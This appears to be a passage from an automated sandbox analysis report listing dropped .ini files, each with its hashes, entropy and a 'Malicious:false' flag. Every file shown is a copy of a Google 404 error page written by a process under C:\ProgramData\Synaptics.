                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4AoucGiPA2cG5pbEsvgJeA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\llqi3eO.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.258252463737999
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0C5mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r5m+pAZewRDK4mW
                                                                                              MD5:4564AE8D12007091144BE898D7538424
                                                                                              SHA1:BFF647B72D0EC86B1A1B7C24FBB313217B0FF25A
                                                                                              SHA-256:7DD274540C6034A4B47BAB2E2ED722986688416652BFF1097C964BF6E4913420
                                                                                              SHA-512:9EF096EF150914EB8AC01AD4EFABDE2FB2A14DF3E828AA29B5354B449C2E0C2FE030EFB6267B62B842C091976D91C81C1B535EF1D31D5CA3934C8ABCEEB875DD
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4vFYJYfScH70vllwzt7V2g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\m3AuJvz.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.268957016780924
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0dtPzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                              MD5:893819091447BCDBFE5E96EFC46D2B43
                                                                                              SHA1:453B1B562ECC3A79D1E88D1B8B9859EA47D0DC3E
                                                                                              SHA-256:84CE2A08AB320C6052AC726A4B318DBD6FE09DC676DF35DDEDEEEC9E7641654A
                                                                                              SHA-512:BB4E84B42F6BBCAECE96D9799675740A0108C90EF1E22596635A558A461E7C2FB378AB3C3D8226C348B61E7D0463DA6F01EECC40C8DD2FA3D7DFE716E546C881
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ol8NfGICO7dPBq7wDUVdqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\m8KaIH7.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.259284182269842
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0Tm3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+im3+pAZewRDK4mW
                                                                                              MD5:5CF4565889173326D64369036FAB30B3
                                                                                              SHA1:7B5ECD8323E2746DD2ECEE2CF5E21A04D57611EC
                                                                                              SHA-256:A05F9CC1738306B2DD39AE53F254D96AD785076915AA4658F0F79832EEFE659B
                                                                                              SHA-512:6CA2FE28CA834607F20E67FB177222DB62F0F9465D04CF50CC5CA5D4B35964FDB59DD2BB26CB04007CF051FE0FFA0665412E1B32916D3A6A971EE697701C17AE
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KfxhfftbOORiucs_WENMAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\mZipSBi.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.265325417656658
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0Y5qSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1U+pAZewRDK4mW
                                                                                              MD5:031AAE00D10F3C7C8C20E0AB736624D8
                                                                                              SHA1:B53927A8F471E27CEC00F3324ED840387D9009EC
                                                                                              SHA-256:0451AC2FC17002449B98ADA3B04A7E246C037FE4F558C81AEAD8845C2CCAF063
                                                                                              SHA-512:B471BDE2CC01DC7F7EE373295AEEF9D502775AFB9F3EA21A5350F35D49F84548978B8AF1E3058256E7F4FAA540DFCF5C6D36490F3FB19501224CF8A754AA7C35
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wXVI4LrJJy-2hSmqKLwfPg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\nU5XqBk.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.266370404062745
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0soXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+bK+pAZewRDK4mW
                                                                                              MD5:C1B7A518D6E3150E905FFE26D5169843
                                                                                              SHA1:C7C5689EB5E03E73F6DAB2DB07C930B2D1144941
                                                                                              SHA-256:F1BA5D21B0C96174E6CAB24EC18F727052E9799B611B5FBBED1B98DD2021C6AC
                                                                                              SHA-512:5BCA7E9E400070100119148BC0E792233688FF2634A362C84BE43357481F5586BC1867860464DE4F6F034DA6C7DECC23A33048B6A59DF9F89122335968DB6832
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xGEUIgDM6usAVg68IDg-4w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\nxLiPLX.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.270517497517003
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                              MD5:1F8FF16BAB8F0BDA414290F912FFA4A6
                                                                                              SHA1:20DF4C72E7533AD6DB7F20F848E69D16ABEF756B
                                                                                              SHA-256:4D5689C8C4EF82F9487633BAF824517B463A1F0859C0F96D5BD78AB4F58ED012
                                                                                              SHA-512:4A3E898D639CD5576E12702BBBE1EABEF09F03648C08974A814BA8DB8DC52228576CDD9C34E2240E874A8EC8E396B168AFA34AA53CFCACC350951E0A1904625D
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KUUEbxoHpCcD_VazMnONGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\pmGNOvk.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.258226981272581
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0kmSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7m+pAZewRDK4mW
                                                                                              MD5:8F70A402ED58271C80A695F7D1D8741C
                                                                                              SHA1:0EEB82D1FD0286588DD262507143D7FDD6BA2DA8
                                                                                              SHA-256:647F967EE98AD0CC48C3C45D37765066DED2657B1C4FB04F8E4C57E5D84D03E9
                                                                                              SHA-512:580563D4EC24FC62C306D2CDBEBB3B067EC3A6270DED41121022E44A3445930196805C80B8FDB117BEE81610AAAEFC6852F675E34EABBF7219AE49E26A3B057F
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ni-UhuZc-lk86-QF2j_gFA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\r6MwybR.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.266222295371733
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0BzmSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++zm+pAZewRDK4mW
                                                                                              MD5:8D0D894FB1313C1E05527F1AF39C3872
                                                                                              SHA1:D3CD37C44AE701FA24F332EF560D463E3C51F9ED
                                                                                              SHA-256:13FFFFCD0393E3D226F90C399E69F7A2416117BCB2A4BD1491A18683942174B2
                                                                                              SHA-512:909EE770A4EB5AEEF88DBCD500F644B7024EAAE4DC042E26C53D3B64DDB21462DCA16FAF38E6BBF9344F5C36ADFFD5B584D9CA50E9DCF321942DD31DA6951D4E
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6PyAFtka3wNky6CVgS-31A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\r8WSJm9.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.267515032110277
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0tSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K+pAZewRDK4mW
                                                                                              MD5:93F0851830A5FC4409C222CE9A9B706D
                                                                                              SHA1:DACCA406624D2E7DBFD07EA5C3FE6467C648F12F
                                                                                              SHA-256:FAE3E6680F032257D1C8E3C4FD10595EFED8FE6290265B3FB529CF097602C70E
                                                                                              SHA-512:FA5C4B85E42EB55F7A51A3A73450ECCEE857F8AD3D4D569D6AC707A2017626A81585E448D6BF12C8BE53FA69822B5821A004A1E2F85673B6323490C37C116C60
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lFRjPAiUzEsB2ITjcz90oA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\rGEn6RI.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.258812593120336
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0DvbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                              MD5:6FF73EF048EBC5F49C6F0CF447A69619
                                                                                              SHA1:A44AEB519C94ECE7D419FFD0E897C491F5146529
                                                                                              SHA-256:DF5B38FFCB2CA5DCFA44EE2566D8E00919D5EA94D1A8B56D060E311257E2A523
                                                                                              SHA-512:083F0286EAEDC1879373ABB1899AAAC32B7ACC78A9EC86103F513D6F1A31D13BC3A141EBB1D39D6058F61C9C964AA897E1CFDD5A6714627AE57F4FE2C9E94FFC
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0N_1dRiGx0G7AYIxE2hXAg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\rQE1GkL.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.2514298226658855
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                              MD5:E700A15EA31418823AA12468522DC089
                                                                                              SHA1:888571B49E42E5B0283C18604C7D45F1816BF283
                                                                                              SHA-256:49B0065D84C084D1797D77D04C351738F2DE78D908FFC8E9BEFE023D58B508E8
                                                                                              SHA-512:1FA79A5E27EE6DF3C60C978EE950787596554E63AD12E7E1D7CC1198C487C669801AE7FCBEF8508CC1D2579F1A35B621D6C44CCC10EC55F80B4B8FBD3582F83E
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kpgLr1Aytg4afXM588aSeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\vH5TQmn.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.264356951630417
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0p5DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w9+pAZewRDK4mW
                                                                                              MD5:694C8292E4751277610A49E2B43FC098
                                                                                              SHA1:25780A8FEDA152B993D17359A0050C80142DCB38
                                                                                              SHA-256:447636F5A0E5C25ACBD240B616B6F015516EE7211855D42DB85D7ADA3B9B775D
                                                                                              SHA-512:64F098A941CB15C3EF4FC9F8CCB9DCAD8F0044CD17038E3A4B366DDCDD289F0FD22B4A71C5710BD5A0CC87E5A68AD910E02667CFD42CA56B17833F0BFB681847
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L2s3yoTH2UwnTP3yqCEL4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\vdpQX4O.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.272900361038389
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+06SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                              MD5:D5D8AFF98B100368BEDC262628F7C828
                                                                                              SHA1:9065C6990827BB32C0E580C58B41A57ACEC5C08A
                                                                                              SHA-256:90D366BFEDCFEE86E02FF0293CE1EDBE32DBC8D59A478785BE8C4AE0D0D0F96F
                                                                                              SHA-512:900E49B56F8EFB202955CCC55D2629160261ED772C9C6A4155B0C24DC50F146C4F23FF9C76DAA83327A61E4C78908D7B861CD1EB7421258314B694EDCF856A7E
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HgQmV8ty3DUNRa5BOF3MiA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\x4dFKOW.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.246829803243631
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0NqISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+sX+pAZewRDK4mW
                                                                                              MD5:3EBF2D6554F8B7CE578C7A5C638D5276
                                                                                              SHA1:9B03828A69077EAAA09CD8AC6D18C655EF9E12F7
                                                                                              SHA-256:1F3D642D4794BA3748C733D52689B4FD3771ADCABD8CE3D36B5FDBB360440D6E
                                                                                              SHA-512:68EAEEB2DA5DC17E51701A0DC9B69A62D8E8B5DB0E64085AD110F76747D463A1E503D4FBF9710387329A26AA08A91D5E29CFB8C7F237F79C868EE977D18BA966
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Id1ipI3e4hlnRR19sEytDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\y7xZMaW.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.267643230863063
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+04zqSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Q+pAZewRDK4mW
                                                                                              MD5:4A84E873FE67712C7AF1E2F2183C97D5
                                                                                              SHA1:10175DA29A64093CED6021A2E820E59B80A006EE
                                                                                              SHA-256:3F8CB4B3CD8D0EDA71B207B52F7BD899B044376A18317AB82D5337E4DB46D1C2
                                                                                              SHA-512:3433AF79F256DA313541299F9539D4A43E630C88999E7960C2E62B03FA58B1DB8158176F755A48BA2A47AD2151A289021DBFE801C7D6D714B427C59B6C468029
                                                                                              Malicious:false
